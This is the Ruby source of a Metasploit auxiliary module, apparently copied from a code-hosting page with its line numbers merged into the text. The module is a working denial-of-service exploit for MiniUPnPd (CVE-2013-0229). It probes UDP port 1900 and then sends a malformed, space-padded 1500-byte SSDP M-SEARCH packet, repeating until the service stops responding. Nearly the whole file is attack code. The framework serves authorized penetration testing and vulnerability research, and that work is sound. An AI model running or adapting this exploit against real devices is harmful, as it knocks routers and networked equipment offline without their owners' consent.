Path: blob/master/modules/auxiliary/dos/upnp/miniupnpd_dos.rb
19669 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Udp7include Msf::Auxiliary::Dos89def initialize(info = {})10super(11update_info(12info,13'Name' => 'MiniUPnPd 1.4 Denial of Service (DoS) Exploit',14'Description' => %q{15This module allows remote attackers to cause a denial of service (DoS)16in MiniUPnP 1.0 server via a specifically crafted UDP request.17},18'Author' => [19'hdm', # Vulnerability discovery20'Dejan Lukan' # Metasploit module21],22'License' => MSF_LICENSE,23'References' => [24[ 'CVE', '2013-0229' ],25[ 'OSVDB', '89625' ],26[ 'BID', '57607' ],27[ 'URL', 'https://www.rapid7.com/blog/post/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play/' ],28[ 'URL', 'https://www.hdm.io/writing/SecurityFlawsUPnP.pdf' ]29],30'DisclosureDate' => '2013-03-27',31'Notes' => {32'Stability' => [CRASH_SERVICE_DOWN],33'SideEffects' => [],34'Reliability' => []35}36)37)3839register_options(40[41Opt::RPORT(1900),42OptInt.new('ATTEMPTS', [true, 'Max number of attempts to DoS the remote MiniUPnP ending', 3 ])43]44)45end4647def send_probe(udp_sock, probe)48udp_sock.put(probe)49data = udp_sock.recvfrom50if data && !data[0].empty?51return data[0]52else53return nil54end55end5657def run58# the M-SEARCH probe packet that tries to identify whether the service is up or not59msearch_probe = "M-SEARCH * HTTP/1.1\r\n"60msearch_probe << "Host:239.255.255.250:1900\r\n"61msearch_probe << "ST:upnp:rootdevice\r\n"62msearch_probe << "Man:\"ssdp:discover\"\r\n"63msearch_probe << "MX:3\r\n"64msearch_probe << "\r\n"6566# the M-SEARCH packet that is being read line by line: there shouldn't be CRLF after the67# ST line68sploit = "M-SEARCH * HTTP/1.1\r\n"69sploit << "HOST: 239.255.255.250:1900\r\n"70sploit << 'ST:uuid:schemas:device:MX:3'71# the packet can be at most 1500 bytes long, so add appropriate number of ' ' or '\t'72# this makes the DoS exploit more probable, since we're occupying the stack with arbitrary73# characters: there's more chance that the program will run off the stack.74sploit += ' ' * (1500 - sploit.length)7576# connect to the UDP port77connect_udp7879print_status("#{rhost}:#{rport} - Checking UPnP...")80response = send_probe(udp_sock, msearch_probe)81if response.nil?82print_error("#{rhost}:#{rport} - UPnP end not found")83disconnect_udp84return85end8687(1..datastore['ATTEMPTS']).each do |attempt|88print_status("#{rhost}:#{rport} - UPnP DoS attempt #{attempt}...")8990# send the exploit to the target91print_status("#{rhost}:#{rport} - Sending malformed packet...")92udp_sock.put(sploit)9394# send the probe to the target95print_status("#{rhost}:#{rport} - The target should be unresponsive now...")96response = send_probe(udp_sock, msearch_probe)97if response.nil?98print_good("#{rhost}:#{rport} - UPnP unresponsive")99disconnect_udp100break101else102print_status("#{rhost}:#{rport} - UPnP is responsive still")103end104end105106disconnect_udp107end108end109110111